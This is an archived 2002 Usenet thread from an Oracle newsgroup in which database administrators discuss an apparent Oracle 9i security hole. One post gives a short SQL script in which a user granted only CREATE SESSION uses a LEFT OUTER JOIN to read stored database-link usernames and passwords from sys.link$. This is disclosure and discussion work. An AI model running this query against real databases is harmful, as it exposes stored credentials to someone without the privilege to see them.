Oracle FAQ Your Portal to the Oracle Knowledge Grid
HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US
 

Home -> Community -> Usenet -> c.d.o.server -> Re: 9iDB Security Hole?

Re: 9iDB Security Hole?

From: Jonathan Lewis <jonathan_at_jlcomp.demon.co.uk>
Date: Tue, 16 Apr 2002 00:22:52 +0100
Message-ID: <1018912906.5064.0.nnrp-08.9e984b29@news.demon.co.uk> 






Daniel,



As so often happens, you have put your foot
in your mouth without reading the post.




Examine the entire script carefully -



    The user selecting from sys.link$ has
    been created and granted create session
    AND NO OTHER PRIVLEGE.






--
Jonathan Lewis
http://www.jlcomp.demon.co.uk

Author of:
Practical Oracle 8i: Building Efficient Databases

Next Seminar - Australia - July/August
http://www.jlcomp.demon.co.uk/seminar.html

Host to The Co-Operative Oracle Users' FAQ
http://www.jlcomp.demon.co.uk/faq/ind_faq.html



Daniel Morgan wrote in message <3CBB5EFC.43A50425_at_exesolutions.com>...


>Why ouch? This is known for database links for a long long time. It is not

>present there if you create the link in one of the manners that supports

>security.

>

>And no one other than sys should be looking at sys.link$ anyway. If they

are


>you have been granting SELECT ANY TABLE to people without regard to its

>implications. In 9i access, even with SELECT ANY TABLE goes away. And

>hopefully stays that way.

>

>But if I had my preference, which I don't, Oracle would have encrypted it

>back at version 7.x or before. I would be interested in hearing from anyone

>inside of Oracle why this is there. Thanks.

>

>Daniel Morgan

>

>

>Jonathan Lewis wrote:

>

>> Ouch  - 9.0.1.3 on HP-UX

>>

>> connect / as sysdba

>> CREATE USER us1 IDENTIFIED BY us11;

>> Grant Create  Session To us1;

>>

>> connect us1/us11

>>

>> select a.userid, a.password

>> from sys.link$ a left outer join sys.link$ b on

>> b.name= a.name

>> ;

>>

>> userid   password

>> ---------  --------------

>> XXX        **********

>>

>> --

>> Jonathan Lewis

>> http://www.jlcomp.demon.co.uk

>>

>> Author of:

>> Practical Oracle 8i: Building Efficient Databases

>>

>> Next Seminar - Australia - July/August

>> http://www.jlcomp.demon.co.uk/seminar.html

>>

>> Host to The Co-Operative Oracle Users' FAQ

>> http://www.jlcomp.demon.co.uk/faq/ind_faq.html

>>

>> Vladimir M. Zakharychev wrote in message ...

>> >Anyone with 9i can confirm this?

>> >

>> >

>> >

>> >This effectively means that LEFT OUTER JOIN allows to create views

>> >on tables that are normally not visible (provided that unprivileged user

>> >knows table and column names).

>



Received on Mon Apr 15 2002 - 18:22:52 CDT












Original text of this message













  HOME |
  ASK QUESTION |
  ADD INFO |
  SEARCH |
  E-MAIL US